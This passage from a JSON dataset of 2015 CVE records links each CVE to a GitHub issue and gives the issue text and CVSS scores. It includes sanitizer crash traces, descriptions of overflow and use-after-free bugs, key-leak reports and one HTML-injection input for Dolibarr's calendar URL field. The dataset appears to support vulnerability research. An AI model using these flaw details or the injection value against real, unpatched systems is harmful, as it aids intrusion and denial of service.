  619. "description": "out of bounds write / heap overflow in exfatfsck in function APITAG This input file can trigger a heap overflow in exfatfsck: URLTAG This was found while fuzzing with the tool american fuzzy lop. Here is the stack trace from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffdeb0bf9d0 sp NUMBERTAG ffdeb0bf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG a in __interceptor_pread NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f5 in verify_vbr_checksum PATHTAG NUMBERTAG e NUMBERTAG f5 in exfat_mount PATHTAG NUMBERTAG dd NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG bdfd2 in __interceptor_malloc ( PATHTAG NUMBERTAG e NUMBERTAG in exfat_mount PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_pread NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa 
fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  621. "severity": "HIGH",
  622. "baseScore": 7.8,
  623. "impactScore": 5.9,
  624. "exploitabilityScore": 1.8
  625. },
  626. {
  627. "CVE_ID": "CVE-2015-8080",
  628. "Issue_Url_old": "https://github.com/antirez/redis/issues/2855",
  629. "Issue_Url_new": "https://github.com/redis/redis/issues/2855",
  630. "Repo_new": "redis/redis",
  631. "Issue_Created_At": "2015-11-05T23:56:32Z",
  632. "description": "Integer overflow (leading to stack based buffer overflow) in embedded lua_struct.c. [re posting via github after private reporting, as agreed with antirez] The embedded copy of lua_struct.c suffers from an integer overflow in the APITAG parser that can be used to trigger (at least) a stack based buffer overflow. This affects all released versions of redis in both the NUMBERTAG and NUMBERTAG branches. The following code is part of APITAG ERRORTAG APITAG can be tricked into an integer wraparound with a large size number as input, thus returning a negative value. APITAG has no lower bound/negative check; moreover, there is an implicit int -> APITAG promotion, yielding a very large (unsigned) size value. This, plus further int / APITAG confusion in the whole module, results in stack based buffer overflows in other places, eg. APITAG reachable in Lua via APITAG . Simple APITAG as follows: APITAG Where NUMBERTAG is a user controlled index, larger than APITAG , fooling APITAG '>I' is there to reach a buffer overflow in APITAG NUMBERTAG is a user controlled input stored into value This will result in memory corruption due to a user controlled write outside of a (stack based) array. Running the APITAG above, this can be observed from gdb: APITAG",
  633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  634. "severity": "HIGH",
  635. "baseScore": 7.5,
  636. "impactScore": 3.6,
  637. "exploitabilityScore": 3.9
  638. },
  639. {
  640. "CVE_ID": "CVE-2015-8309",
  641. "Issue_Url_old": "https://github.com/devsnd/cherrymusic/issues/598",
  642. "Issue_Url_new": "https://github.com/devsnd/cherrymusic/issues/598",
  643. "Repo_new": "devsnd/cherrymusic",
  644. "Issue_Created_At": "2015-11-18T10:03:58Z",
  645. "description": "Security vulnerabilities discovered. Hi, Could you please get in touch with me to discuss NUMBERTAG vulnerabilities I've discovered in cherrymusic. feedersec [at] gmail [dot] com. Thanks.",
  646. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  647. "severity": "MEDIUM",
  648. "baseScore": 4.3,
  649. "impactScore": 1.4,
  650. "exploitabilityScore": 2.8
  651. },
  652. {
  653. "CVE_ID": "CVE-2015-8400",
  654. "Issue_Url_old": "https://github.com/shellinabox/shellinabox/issues/355",
  655. "Issue_Url_new": "https://github.com/shellinabox/shellinabox/issues/355",
  656. "Repo_new": "shellinabox/shellinabox",
  657. "Issue_Created_At": "2015-12-02T09:56:27Z",
  658. "description": "HTTP fallback via \"/plain\" allows opportunity for DNS rebinding attack. The shellinabox server, while using the HTTPS protocol, allows HTTP fallback through the \"/plain\" URL. This exposes the opportunity for a potential DNS rebinding attack, by malicious APITAG loaded in the context of the user browser, that would allow connection to shellinabox in the time window between server startup and user reconfiguration of default credentials (scenario is vanilla installation of, as an example, an embedded system). The \"/plain\" fallback should be disabled by default to improve security and mitigate such an attack. Credit goes to Stephen R\u00f6ttger from the Google Security Team for identifying the issue.",
  659. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  660. "severity": "HIGH",
  661. "baseScore": 7.4,
  662. "impactScore": 4.0,
  663. "exploitabilityScore": 2.8
  664. },
  665. {
  666. "CVE_ID": "CVE-2015-8559",
  667. "Issue_Url_old": "https://github.com/chef/chef/issues/3871",
  668. "Issue_Url_new": "https://github.com/chef/chef/issues/3871",
  669. "Repo_new": "chef/chef",
  670. "Issue_Created_At": "2015-09-03T22:22:50Z",
  671. "description": "knife bootstrap leaks validator.pem private key into system logs. When you 'knife bootstrap' a node, the validator.pem private RSA key is leaked into the system logs PATHTAG The reason is that 'knife bootstrap' constructs a shell command to run on the node from a template, filling the private key in as a here doc (see URLTAG This command is invoked via (more or less): ssh node 'sudo sh -c full command goes here' As a result, the private key ends up on the command line, in the process table, and, by way of sudo command logging on most reasonable systems, in the system logs. The logs may also be forwarded to other places (possibly in clear text), and possibly stored on other systems, making the private validator key not quite so private any more. Secrets should not be passed in argv at all: send the key over the ssh session's stdin or write it to a mode 0600 file on the node instead, and treat any validator key that has already been bootstrapped this way as exposed and rotate it.",
  672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  673. "severity": "HIGH",
  674. "baseScore": 7.5,
  675. "impactScore": 3.6,
  676. "exploitabilityScore": 3.9
  677. },
  678. {
  679. "CVE_ID": "CVE-2015-8612",
  680. "Issue_Url_old": "https://github.com/blueman-project/blueman/issues/416",
  681. "Issue_Url_new": "https://github.com/blueman-project/blueman/issues/416",
  682. "Repo_new": "blueman-project/blueman",
  683. "Issue_Created_At": "2015-12-18T11:27:11Z",
  684. "description": "Privilege escalation in blueman DBUS API. Just saw this online: URLTAG Seems related to this: URLTAG",
  685. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  686. "severity": "HIGH",
  687. "baseScore": 8.4,
  688. "impactScore": 5.9,
  689. "exploitabilityScore": 2.5
  690. },
  691. {
  692. "CVE_ID": "CVE-2015-8618",
  693. "Issue_Url_old": "https://github.com/golang/go/issues/13515",
  694. "Issue_Url_new": "https://github.com/golang/go/issues/13515",
  695. "Repo_new": "golang/go",
  696. "Issue_Created_At": "2015-12-06T19:40:07Z",
  697. "description": "APITAG Incorrect results on NUMBERTAG bit platforms. CODETAG I get different results whether I run it in amd NUMBERTAG mode or NUMBERTAG mode CODETAG The first one is correct (you can verify this with python thus) CODETAG The playground also gives the incorrect results URLTAG .",
  698. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  699. "severity": "HIGH",
  700. "baseScore": 7.5,
  701. "impactScore": 3.6,
  702. "exploitabilityScore": 3.9
  703. },
  704. {
  705. "CVE_ID": "CVE-2015-8685",
  706. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4291",
  707. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4291",
  708. "Repo_new": "dolibarr/dolibarr",
  709. "Issue_Created_At": "2015-12-24T17:52:10Z",
  710. "description": "HTML Injection in \"import external calendar\". Hi, You have an HTML injection in the \"url\" field of the external calendar import. You only need to set the url parameter to something like: \">< h1>injection APITAG to see the HTML injection. The value should be validated as a URL and HTML-encoded when rendered. Regards FILETAG",
  711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  712. "severity": "MEDIUM",
  713. "baseScore": 6.1,
  714. "impactScore": 2.7,
  715. "exploitabilityScore": 2.8
  716. },
  717. {
  718. "CVE_ID": "CVE-2015-8702",
  719. "Issue_Url_old": "https://github.com/inspircd/inspircd/issues/1033",
  720. "Issue_Url_new": "https://github.com/inspircd/inspircd/issues/1033",
  721. "Repo_new": "inspircd/inspircd",
  722. "Issue_Created_At": "2015-04-16T07:59:42Z",
  723. "description": "Inspircd S2S UID command error from specific ISP. I am using inspircd NUMBERTAG and when a user connects from this ISP APITAG inspircd returns the following error: ERRORTAG Protocol specification: APITAG User connection: CODETAG Visual comparison FILETAG You can see a white space between NUMBERTAG APITAG Why does the hostname have white space? Is it possibly an inspircd bug? When this error occurred the two servers had a netsplit. If the hostname is placed into the UID command without validation, a single such connection can break the server link (the netsplit observed here), which is a remotely triggerable availability impact. Thanks in advance.",
  724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  725. "severity": "HIGH",
  726. "baseScore": 8.6,
  727. "impactScore": 4.0,
  728. "exploitabilityScore": 3.9
  729. },
  730. {
  731. "CVE_ID": "CVE-2015-8786",
  732. "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
  733. "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
  734. "Repo_new": "rabbitmq/rabbitmq-management",
  735. "Issue_Created_At": "2015-12-29T05:25:23Z",
  736. "description": "Validate (limit) user provided query parameters, e.g. lengths_age. APITAG and APITAG need to be validated and capped the same way page size is.",
  737. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  738. "severity": "MEDIUM",
  739. "baseScore": 6.5,
  740. "impactScore": 3.6,
  741. "exploitabilityScore": 2.8
  742. },
  743. {
  744. "CVE_ID": "CVE-2015-8851",
  745. "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/108",
  746. "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/108",
  747. "Repo_new": "broofa/node-uuid",
  748. "Issue_Created_At": "2015-03-23T22:52:46Z",
  749. "description": "crypto API isn't used in FILETAG context. After commit APITAG the Node Crypto API isn't used anymore. I'm not sure if this is critical as NUMBERTAG is random or pseudo random based (the RFC advises the use of cryptographic quality random numbers but doesn't require it in any way). I'm not sure if this is something that is planned to be fixed ( APITAG is significantly faster and this may be a good reason to keep it that way and not to use the Crypto API by default). As for now I'm using APITAG passing ERRORTAG as random generator. Caveat: a v4 UUID produced by a non-cryptographic PRNG may be predictable from previously observed values, so UUIDs generated this way must not be used as session identifiers, reset tokens or other secrets.",
  750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  751. "severity": "HIGH",
  752. "baseScore": 7.5,
  753. "impactScore": 3.6,
  754. "exploitabilityScore": 3.9
  755. },
  756. {
  757. "CVE_ID": "CVE-2015-8851",
  758. "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/122",
  759. "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/122",
  760. "Repo_new": "broofa/node-uuid",
  761. "Issue_Created_At": "2015-11-07T23:36:47Z",
  762. "description": "FILETAG SECURITY VULN: false === APITAG == 'function'). I've tested this on FILETAG NUMBERTAG and node.js NUMBERTAG Tested with npm install save node uuid MENTIONTAG Discovered this after posting a joke on twitter URLTAG and then decided to actually try replacing APITAG with an error throwing function to as part of a security audit on my software and its modules. ERRORTAG Should be ERRORTAG , pull requesting....",
  763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  764. "severity": "HIGH",
  765. "baseScore": 7.5,
  766. "impactScore": 3.6,
  767. "exploitabilityScore": 3.9
  768. },
  769. {
  770. "CVE_ID": "CVE-2015-8863",
  771. "Issue_Url_old": "https://github.com/stedolan/jq/issues/995",
  772. "Issue_Url_new": "https://github.com/stedolan/jq/issues/995",
  773. "Repo_new": "stedolan/jq",
  774. "Issue_Created_At": "2015-10-18T17:07:03Z",
  775. "description": "Heap based buffer overflow in APITAG On Sun, Oct NUMBERTAG at NUMBERTAG Jakub Wilk wrote: > Package: jq > Version NUMBERTAG dfsg NUMBERTAG Usertags: afl > > There's heap based buffer overflow in APITAG > > $ valgrind jq . FILETAG NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright > info NUMBERTAG Command: jq . FILETAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG D NUMBERTAG B: check_literal APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG NUMBERTAG Address NUMBERTAG b7c5e8 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG A1DC: malloc (in > PATHTAG NUMBERTAG by NUMBERTAG C3D0: realloc (in > PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG jv_mem_realloc APITAG NUMBERTAG by NUMBERTAG D NUMBERTAG tokenadd APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG scan APITAG NUMBERTAG by NUMBERTAG E NUMBERTAG jv_parser_next APITAG NUMBERTAG by NUMBERTAG C: jq_util_input_next_input APITAG NUMBERTAG by NUMBERTAG D3C9: main APITAG > ... > > APITAG that I rebuilt the package with noopt to make the backtrace more > useful.) > > This bug was found using American fuzzy lop: > URLTAG see CVETAG",
  776. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  777. "severity": "CRITICAL",
  778. "baseScore": 9.8,
  779. "impactScore": 5.9,
  780. "exploitabilityScore": 3.9
  781. },
  782. {
  783. "CVE_ID": "CVE-2015-8871",
  784. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/563",
  785. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/563",
  786. "Repo_new": "uclouvain/openjpeg",
  787. "Issue_Created_At": "2015-08-14T16:58:01Z",
  788. "description": "Use after free in opj_j2k_write_mco. Hi, I have found a potential use after free in opj_j2k_write_mco function, of the FILETAG file. At line NUMBERTAG URLTAG , l_current_data is set to p_j2k APITAG But at line NUMBERTAG URLTAG , p_j2k APITAG is used as arg of realloc, and so can be freed. But l_current_data is used later (line NUMBERTAG URLTAG NUMBERTAG URLTAG ...), and so can point to a freed memory zone A simple fixed, should be to affect l_current_data to p_j2k APITAG after the line NUMBERTAG URLTAG The vulnerability was found by my static binary analyzer gueb (that will become open source soon) Regards, Feist Josselin",
  789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  790. "severity": "CRITICAL",
  791. "baseScore": 9.8,
  792. "impactScore": 5.9,
  793. "exploitabilityScore": 3.9
  794. },
  795. {
  796. "CVE_ID": "CVE-2015-8872",
  797. "Issue_Url_old": "https://github.com/dosfstools/dosfstools/issues/12",
  798. "Issue_Url_new": "https://github.com/dosfstools/dosfstools/issues/12",
  799. "Repo_new": "dosfstools/dosfstools",
  800. "Issue_Created_At": "2015-09-08T08:18:17Z",
  801. "description": "APITAG invalid memory access in get_fat. This file will generate some invalid memory read in APITAG URLTAG Judging from the output of address sanitizer and valgrind it is a bit unusual, it seems to be neither memory on the stack or heap, but it also doesn't crash the app if run without asan or valgrind. Happens both with the latest release and latest git code. Found with american fuzzy lop. This is the address sanitizer stack trace NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG d8 (pc NUMBERTAG f1ace bp NUMBERTAG ffcae3ad NUMBERTAG sp NUMBERTAG ffcae3ad NUMBERTAG T NUMBERTAG f1acd in get_fat PATHTAG NUMBERTAG ea4e6 in check_file PATHTAG NUMBERTAG ea4e6 in check_files PATHTAG NUMBERTAG ede NUMBERTAG in scan_dir PATHTAG NUMBERTAG ede NUMBERTAG in subdirs PATHTAG NUMBERTAG e4f NUMBERTAG in scan_root PATHTAG NUMBERTAG ddaf4 in main PATHTAG NUMBERTAG efe5b4eef9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG get_fat",
  802. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  803. "severity": "MEDIUM",
  804. "baseScore": 6.2,
  805. "impactScore": 3.6,
  806. "exploitabilityScore": 2.5
  807. },
  808. {
  809. "CVE_ID": "CVE-2015-8877",
  810. "Issue_Url_old": "https://github.com/libgd/libgd/issues/173",
  811. "Issue_Url_new": "https://github.com/libgd/libgd/issues/173",
  812. "Repo_new": "libgd/libgd",
  813. "Issue_Created_At": "2015-07-13T16:02:50Z",
  814. "description": "APITAG can leak memory. In APITAG a tmp_im is created with APITAG URLTAG , but later freed with APITAG URLTAG instead of APITAG This is likely to cause a memory leak. See also the related downstream bug report CVETAG .",
  815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  816. "severity": "HIGH",
  817. "baseScore": 7.5,
  818. "impactScore": 3.6,
  819. "exploitabilityScore": 3.9
  820. },
  821. {
  822. "CVE_ID": "CVE-2015-8928",
  823. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/550",
  824. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/550",
  825. "Repo_new": "libarchive/libarchive",
  826. "Issue_Created_At": "2015-05-21T19:37:41Z",
  827. "description": "Out of bounds read in function APITAG on malformed mtree file. This sample file will generate an out of bounds read access: URLTAG File content NUMBERTAG link NUMBERTAG Address Sanitizer output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef4f at pc NUMBERTAG b NUMBERTAG cc bp NUMBERTAG fff5ddb NUMBERTAG d0 sp NUMBERTAG fff5ddaf NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef4f thread T NUMBERTAG b NUMBERTAG cb in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG ac in process_add_entry PATHTAG NUMBERTAG b4fc1 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef4f is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG c NUMBERTAG in realloc ( PATHTAG NUMBERTAG a NUMBERTAG in archive_string_ensure PATHTAG NUMBERTAG ce NUMBERTAG in readline PATHTAG NUMBERTAG b NUMBERTAG d7 in read_mtree PATHTAG NUMBERTAG ad NUMBERTAG in read_header PATHTAG NUMBERTAG d in _archive_read_next_header2 PATHTAG NUMBERTAG de2 in _archive_read_next_header PATHTAG NUMBERTAG b0c7de in archive_read_next_header PATHTAG NUMBERTAG e1f in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG f4e NUMBERTAG f9f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa NUMBERTAG fa[fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  828. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  829. "severity": "MEDIUM",
  830. "baseScore": 5.5,
  831. "impactScore": 3.6,
  832. "exploitabilityScore": 1.8
  833. },
  834. {
  835. "CVE_ID": "CVE-2015-8931",
  836. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/539",
  837. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/539",
  838. "Repo_new": "libarchive/libarchive",
  839. "Issue_Created_At": "2015-05-12T16:22:51Z",
  840. "description": "undefined behaviour in APITAG When compiling libarchive with the compile flag fsanitize=undefined (enabling undefined behaviour sanitizer) it'll throw a warning when trying to open any mtree file: APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' APITAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long int' This is the code that's causing this: static int NUMBERTAG t get_time_t_max(void) { if defined(TIME_T_MAX) return TIME_T_MAX; else static time_t t; time_t a; if (t NUMBERTAG a NUMBERTAG while (a > t) { t = a; a = a NUMBERTAG return t; endif } static int NUMBERTAG t get_time_t_min(void) { if defined(TIME_T_MIN) return TIME_T_MIN; else / 't' will hold the minimum value, which will be zero (if time_t is unsigned) or NUMBERTAG n (if time_t is signed). / static int computed; static time_t t; time_t a; if (computed NUMBERTAG a = (time_t NUMBERTAG while (a < t) { t = a; a = a NUMBERTAG computed NUMBERTAG return t; endif } What libarchive is trying to do here is calculating the value of TIME_T_MIN/MAX by triggering an overflow. However overflows in signed values are undefined in C. This code is therefore strictly speaking invalid, the compiler may do whatever it likes in such situations, without any defined outcome. I haven't come up with an elegant other way to do this yet. Probably the best would be to convince the glibc devs to define TIME_T_MIN/MAX in their headers.",
  841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  842. "severity": "HIGH",
  843. "baseScore": 7.8,
  844. "impactScore": 5.9,
  845. "exploitabilityScore": 1.8
  846. },
  847. {
  848. "CVE_ID": "CVE-2015-8932",
  849. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/547",
  850. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/547",
  851. "Repo_new": "libarchive/libarchive",
  852. "Issue_Created_At": "2015-05-20T00:04:53Z",
  853. "description": "undefined behaviour / invalid shiftleft in compress_bidder_init. This file will trigger a shiftleft of NUMBERTAG bytes of a signed NUMBERTAG bit integer: URLTAG (just two bytes NUMBERTAG f NUMBERTAG d) A shiftleft of the full size of a variable type is undefined in c. This can be seen by compiling libarchive with fsanitize=undefined and trying to unpack the file (bsdtar xf). Here's the error message / crash dump: APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int NUMBERTAG a NUMBERTAG b6 in compress_bidder_init PATHTAG NUMBERTAG fe NUMBERTAG a in choose_filters PATHTAG NUMBERTAG ec8c2 in archive_read_open1 PATHTAG NUMBERTAG b9c in archive_read_open_filenames PATHTAG NUMBERTAG in archive_read_open_filename PATHTAG NUMBERTAG in read_archive PATHTAG NUMBERTAG b in tar_mode_x PATHTAG NUMBERTAG fee NUMBERTAG in main PATHTAG NUMBERTAG f1be NUMBERTAG a4f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG",
  854. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  855. "severity": "MEDIUM",
  856. "baseScore": 5.5,
  857. "impactScore": 3.6,
  858. "exploitabilityScore": 1.8
  859. },
  860. {
  861. "CVE_ID": "CVE-2015-8933",
  862. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/548",
  863. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/548",
  864. "Repo_new": "libarchive/libarchive",
  865. "Issue_Created_At": "2015-05-20T00:15:08Z",
  866. "description": "undefined behaviour / signed integer overflow in APITAG Using this malformed tar file with \"bsdtar tf [input]\" will cause a signed integer overflow: FILETAG Signed integer overflows are undefined in C. This can be seen by compiling libarchive with fsanitize=undefined. Here's the crash dump: PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'long NUMBERTAG c NUMBERTAG in archive_read_format_tar_skip PATHTAG NUMBERTAG in archive_read_data_skip PATHTAG NUMBERTAG a NUMBERTAG in read_archive PATHTAG NUMBERTAG dbb in tar_mode_t PATHTAG NUMBERTAG feddc in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG ) SUMMARY: APITAG undefined behavior APITAG bsdtar: (null) bsdtar: Error exit delayed from previous errors.",
  867. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  868. "severity": "MEDIUM",
  869. "baseScore": 5.5,
  870. "impactScore": 3.6,
  871. "exploitabilityScore": 1.8
  872. },
  873. {
  874. "CVE_ID": "CVE-2015-8945",
  875. "Issue_Url_old": "https://github.com/openshift/origin/issues/3951",
  876. "Issue_Url_new": "https://github.com/openshift/origin/issues/3951",
  877. "Repo_new": "openshift/origin",
  878. "Issue_Created_At": "2015-07-29T20:28:23Z",
  879. "description": "openshift node is logging private RSA keys to the systemd journal. ERRORTAG",
  880. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  881. "severity": "MEDIUM",
  882. "baseScore": 5.1,
  883. "impactScore": 3.6,
  884. "exploitabilityScore": 1.4
  885. },
  886. {
  887. "CVE_ID": "CVE-2015-8947",
  888. "Issue_Url_old": "https://github.com/behdad/harfbuzz/issues/139",
  889. "Issue_Url_new": "https://github.com/harfbuzz/harfbuzz/issues/139",
  890. "Repo_new": "harfbuzz/harfbuzz",
  891. "Issue_Created_At": "2015-10-09T20:45:00Z",
  892. "description": "fuzzing harfbuzz. This in an umbrella issue for setting up regular fuzzing for harfbuzz and fixing the bugs that we find with fuzzing. The starting point is the target function below used with FILETAG . CODETAG Eventually we'll need to submit this function to harfbuzz repo and extend it to cover more code. Currently, this is my workflow to build the fuzzer NUMBERTAG Get fresh FILETAG and build FILETAG NUMBERTAG ERRORTAG",
  893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
  894. "severity": "HIGH",
  895. "baseScore": 7.6,
  896. "impactScore": 4.7,
  897. "exploitabilityScore": 2.8
  898. },
  899. {
  900. "CVE_ID": "CVE-2015-9096",
  901. "Issue_Url_old": "https://github.com/rubysec/ruby-advisory-db/issues/215",
  902. "Issue_Url_new": "https://github.com/rubysec/ruby-advisory-db/issues/215",
  903. "Repo_new": "rubysec/ruby-advisory-db",
